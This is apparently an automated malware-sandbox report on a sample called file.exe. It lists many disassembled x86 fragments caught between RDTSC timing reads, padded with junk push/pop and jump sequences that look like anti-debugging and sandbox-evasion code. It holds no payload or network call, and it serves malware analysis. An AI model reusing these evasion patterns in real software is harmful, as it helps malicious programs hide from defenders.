                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98E0C second address: C98E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 xor dword ptr [esp], 0CEF21CEh 0x0000000f sub dword ptr [ebp+122D1916h], ebx 0x00000015 push 00000003h 0x00000017 mov dword ptr [ebp+1244C728h], edx 0x0000001d push 00000000h 0x0000001f or edx, dword ptr [ebp+122D2A16h] 0x00000025 push 00000003h 0x00000027 jp 00007F7980D061B8h 0x0000002d mov esi, edx 0x0000002f call 00007F7980D061B9h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F7980D061BAh 0x0000003b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98E50 second address: C98E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98E56 second address: C98F0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnp 00007F7980D061D0h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 jmp 00007F7980D061C7h 0x0000001c pop eax 0x0000001d mov eax, dword ptr [eax] 0x0000001f push edx 0x00000020 jmp 00007F7980D061C6h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e jmp 00007F7980D061C8h 0x00000033 popad 0x00000034 jl 00007F7980D061B8h 0x0000003a push edi 0x0000003b pop edi 0x0000003c popad 0x0000003d pop eax 0x0000003e mov edx, dword ptr [ebp+122D292Ah] 0x00000044 mov dword ptr [ebp+122D18AAh], edx 0x0000004a lea ebx, dword ptr [ebp+1244DC80h] 0x00000050 and dh, 0000001Ah 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98F0C second address: C98F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98FCE second address: C99056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F7980D061C1h 0x00000011 jmp 00007F7980D061C1h 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 jnl 00007F7980D061BBh 0x0000001f mov dx, bx 0x00000022 popad 0x00000023 push 00000000h 0x00000025 mov dh, 7Ch 0x00000027 call 00007F7980D061B9h 0x0000002c jmp 00007F7980D061C2h 0x00000031 push eax 0x00000032 jmp 00007F7980D061BBh 0x00000037 mov eax, dword ptr [esp+04h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jbe 00007F7980D061C2h 0x00000043 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99056 second address: C99060 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7981407BECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99060 second address: C9906D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9906D second address: C99072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99072 second address: C9908F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9908F second address: C99099 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7981407BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99099 second address: C9909F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9909F second address: C990A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C990A3 second address: C9910B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 call 00007F7980D061C7h 0x0000000e jmp 00007F7980D061C7h 0x00000013 pop edx 0x00000014 push 00000003h 0x00000016 jno 00007F7980D061C3h 0x0000001c push 00000000h 0x0000001e mov dx, bx 0x00000021 push 00000003h 0x00000023 mov esi, 0D17237Eh 0x00000028 call 00007F7980D061B9h 0x0000002d push edx 0x0000002e pushad 0x0000002f push edi 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9910B second address: C99162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007F7981407BF5h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jo 00007F7981407BEEh 0x00000016 push esi 0x00000017 js 00007F7981407BE6h 0x0000001d pop esi 0x0000001e mov eax, dword ptr [eax] 0x00000020 ja 00007F7981407BFEh 0x00000026 push esi 0x00000027 jmp 00007F7981407BF6h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 pop edi 0x00000036 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99162 second address: C991B4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7980D061B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7980D061C1h 0x0000000f popad 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F7980D061B8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b movsx esi, ax 0x0000002e cmc 0x0000002f lea ebx, dword ptr [ebp+1244DC89h] 0x00000035 mov ecx, 2FE113EEh 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C991B4 second address: C991B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C991B8 second address: C991C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F7980D061B6h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABD9E second address: CABDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7366 second address: CB736C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB736C second address: CB7372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7372 second address: CB7378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB74CD second address: CB74D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB74D2 second address: CB74ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C4h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7629 second address: CB762D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB762D second address: CB765C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C9h 0x00000007 jmp 00007F7980D061BCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B26 second address: CB7B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7981407BF6h 0x0000000a jmp 00007F7981407BEEh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B40 second address: CB7B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B49 second address: CB7B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B4F second address: CB7B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F7980D061B6h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7B5F second address: CB7B77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F7981407BEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7FAE second address: CB7FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7FB3 second address: CB7FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7981407BF3h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB816F second address: CB8175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB83FF second address: CB8403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8D8A second address: CB8D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8D99 second address: CB8DAA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7981407BE6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8DAA second address: CB8DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB90D2 second address: CB90D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF744 second address: CBF748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF748 second address: CBF768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7981407BF2h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF768 second address: CBF76C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF76C second address: CBF772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF772 second address: CBF778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC10C0 second address: CC10C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC10C4 second address: CC10E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jg 00007F7980D061B6h 0x0000000d pop esi 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F7980D061B6h 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC10E0 second address: CC10EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F7981407BE6h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC10EE second address: CC10F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1250 second address: CC1259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3B07 second address: CC3B0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3C6A second address: CC3C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3F14 second address: CC3F19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC404F second address: CC406B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F7981407BF5h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC41E3 second address: CC4218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BEh 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7980D061C4h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F7980D061B6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4218 second address: CC4224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4224 second address: CC4228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6DE5 second address: CC6DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC79AB second address: CC79AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC79AF second address: CC79B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7C08 second address: CC7C0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC878F second address: CC8793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8793 second address: CC87AF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7980D061C3h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8D50 second address: CC8D5A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7981407BECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA7B0 second address: CCA7B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9EF7 second address: CC9EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA7B4 second address: CCA80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7980D061BCh 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e jnc 00007F7980D061BCh 0x00000014 pop edi 0x00000015 nop 0x00000016 mov si, ax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F7980D061B8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 jng 00007F7980D061BCh 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBD4B second address: CCBD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b ja 00007F7981407BE6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD220 second address: CCD224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDE16 second address: CCDE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2B48 second address: CD2B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 jng 00007F7980D061C6h 0x0000000d jmp 00007F7980D061C0h 0x00000012 push 00000000h 0x00000014 mov di, dx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F7980D061B8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 cld 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jne 00007F7980D061B6h 0x0000003f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2B9D second address: CD2BB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3980 second address: CD39EA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7980D061BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F7980D061B8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov ebx, dword ptr [ebp+122D17C6h] 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D3429h], eax 0x00000037 jmp 00007F7980D061C8h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 js 00007F7980D061B6h 0x00000047 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE5B2 second address: CCE5CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7981407BEBh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d js 00007F7981407BECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD39EA second address: CD39EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD39EE second address: CD39F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD39F4 second address: CD39FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD39FA second address: CD39FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD49FC second address: CD4A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5986 second address: CD59F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7981407BF8h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F7981407BE8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jo 00007F7981407BECh 0x0000002d mov edi, dword ptr [ebp+122D2516h] 0x00000033 push 00000000h 0x00000035 xor dword ptr [ebp+12458E12h], eax 0x0000003b push 00000000h 0x0000003d cld 0x0000003e xchg eax, esi 0x0000003f jp 00007F7981407BEEh 0x00000045 jc 00007F7981407BE8h 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD59F7 second address: CD59FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3B42 second address: CD3B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD4BDE second address: CD4BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5C1C second address: CD5C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD69C6 second address: CD69CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5C20 second address: CD5C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
